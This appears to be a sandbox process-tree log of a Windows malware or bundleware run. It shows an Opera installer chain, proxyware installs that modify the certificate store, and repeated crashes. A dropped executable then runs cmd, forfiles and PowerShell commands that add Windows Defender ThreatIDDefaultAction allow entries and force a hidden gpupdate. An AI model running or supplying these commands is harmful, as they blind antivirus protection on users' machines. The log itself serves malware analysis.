C:\Users\Admin\AppData\Local\Temp\RX2iLIAc\Upy76WritOeZU.exe"C:\Users\Admin\AppData\Local\Temp\RX2iLIAc\Upy76WritOeZU.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2808 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240505011941" --session-guid=d72c63bb-6b10-479e-9d6f-b98e47efb8c8 --server-tracking-blob=YjdlZjYyM2I3YmIwNDlhMjk3MWQ2ZDI3NDEzNGFlZGRhMGU4N2JjYTljOWU3MTEyMDI2YmNlNThjODI4YzQ3MTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcxNDg3MTk3My41MzI1IiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib3AxMzIiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJSU1RQIn0sInV1aWQiOiIyMGQ5ZTM5ZS0zOGE4LTQ1YTItYWQzMi1lMzllNTZkZTIwZjYifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=7C050000000000005⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:1564 -
C:\Users\Admin\AppData\Local\Temp\RX2iLIAc\Upy76WritOeZU.exeC:\Users\Admin\AppData\Local\Temp\RX2iLIAc\Upy76WritOeZU.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2c0,0x2c4,0x2c8,0x290,0x2cc,0x6d67e1d0,0x6d67e1dc,0x6d67e1e86⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5652
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202405050119411\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202405050119411\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"5⤵
- Executes dropped EXE
PID:4432
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202405050119411\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202405050119411\assistant\assistant_installer.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2348 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202405050119411\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202405050119411\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x1136038,0x1136044,0x11360506⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5452
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 21804⤵
- Program crash
PID:4644
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 22844⤵
- Program crash
PID:5444
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 22804⤵
- Program crash
PID:4020
-
-
C:\Users\Admin\AppData\Local\Temp\Ch3TN7iP\mL58FJENjTIb9.exeC:\Users\Admin\AppData\Local\Temp\Ch3TN7iP\mL58FJENjTIb9.exe -6wqfqov40w8wuojd26si1tc58hxkkp5v4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5736
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 22324⤵
- Program crash
PID:5484
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 22804⤵
- Program crash
PID:5912
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 22724⤵
- Program crash
PID:4536
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 22604⤵
- Program crash
PID:4544
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 22364⤵
- Program crash
PID:5928
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 21684⤵
- Program crash
PID:4888
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 15204⤵
- Program crash
PID:5444
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 20444⤵
- Program crash
PID:4812
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 20204⤵
- Program crash
PID:1696
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 19044⤵
- Program crash
PID:5796
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 20164⤵
- Program crash
PID:2432
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 9164⤵
- Program crash
PID:4648
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 17364⤵
- Program crash
PID:5796
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 19684⤵
- Program crash
PID:3180
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4440 -ip 44401⤵PID:5904
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4440 -ip 44401⤵PID:5368
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4440 -ip 44401⤵PID:6004
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4440 -ip 44401⤵PID:2356
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4440 -ip 44401⤵PID:4812
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4440 -ip 44401⤵PID:5320
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4440 -ip 44401⤵PID:5712
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4440 -ip 44401⤵PID:4800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4440 -ip 44401⤵PID:5784
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4440 -ip 44401⤵PID:5800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4440 -ip 44401⤵PID:4460
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4440 -ip 44401⤵PID:2768
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4440 -ip 44401⤵PID:2940
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4440 -ip 44401⤵PID:4884
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4440 -ip 44401⤵PID:3996
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4440 -ip 44401⤵PID:5812
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4440 -ip 44401⤵PID:1208
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4440 -ip 44401⤵PID:5388
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4440 -ip 44401⤵PID:1348
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4440 -ip 44401⤵PID:2020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4440 -ip 44401⤵PID:5424
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4440 -ip 44401⤵PID:6112
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4440 -ip 44401⤵PID:5392
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4440 -ip 44401⤵PID:3584
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4440 -ip 44401⤵PID:5964
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4440 -ip 44401⤵PID:2924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4440 -ip 44401⤵PID:4132
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4440 -ip 44401⤵PID:5244
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4440 -ip 44401⤵PID:2808
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4440 -ip 44401⤵PID:5736
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4440 -ip 44401⤵PID:3996
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4440 -ip 44401⤵PID:4756
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4440 -ip 44401⤵PID:3088
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4440 -ip 44401⤵PID:3956
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4440 -ip 44401⤵PID:3932
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4440 -ip 44401⤵PID:528
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4440 -ip 44401⤵PID:384
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4440 -ip 44401⤵PID:5528
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4440 -ip 44401⤵PID:1876
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4440 -ip 44401⤵PID:4860
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4440 -ip 44401⤵PID:5972
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4440 -ip 44401⤵PID:3932
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4440 -ip 44401⤵PID:2924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4440 -ip 44401⤵PID:1452
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4440 -ip 44401⤵PID:1056
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4440 -ip 44401⤵PID:5240
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4440 -ip 44401⤵PID:2168
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4440 -ip 44401⤵PID:2256
-
C:\Program Files\WProxy\WinProxy\WinProxy.exe"C:\Program Files\WProxy\WinProxy\WinProxy.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5928
-
C:\Program Files\Geonode\Repocket\Repocket.exe"C:\Program Files\Geonode\Repocket\Repocket.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:3488
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4440 -ip 44401⤵PID:2408
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4440 -ip 44401⤵PID:4800
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:1208
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4440 -ip 44401⤵PID:2448
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4440 -ip 44401⤵PID:4788
-
C:\Users\Admin\AppData\Local\Temp\MRB4foRz\AczmJ.exeC:\Users\Admin\AppData\Local\Temp\MRB4foRz\AczmJ.exe fM /YJrdidztiA 757674 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6008 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:4212
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:5224
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:5276
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:1060
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:528
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:5852
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:5912
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:3032
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:4192
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2704
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:5452
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:2468
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:4860
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:5952
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:116
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:768 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:628
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1144 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:5032
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:5532
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:2428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:6112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:1336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:6072
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:5276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4184
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:2448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:5796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:5356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:5032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:2428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:5700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3176
-
-
